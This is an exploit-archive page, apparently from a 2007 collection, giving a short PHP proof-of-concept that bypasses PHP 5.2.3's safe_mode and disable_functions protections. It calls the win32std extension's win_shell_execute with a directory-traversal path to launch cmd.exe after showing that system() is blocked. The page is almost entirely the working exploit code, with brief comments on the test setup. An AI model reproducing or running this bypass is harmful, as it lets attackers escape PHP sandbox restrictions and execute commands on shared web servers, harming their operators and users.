PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass
# Published : 2007-07-24
# Author : shinnai
# Previous Title : CrystalPlayer 1.98 Playlist Crafted mls File Local Buffer Overflow Exploit
# Next Title : PHP 5.x (win32service) Local Safe Mode Bypass Exploit

<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp Pro sp2 full patched, worked both from the cli and on apache

//Thanks to rgod for all his precious advises :)

//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the cli, cmd.exe will be wxecuted
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager

if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\..\..\..\windows\system32\cmd.exe");
?>

# www.Syue.com [2007-07-24]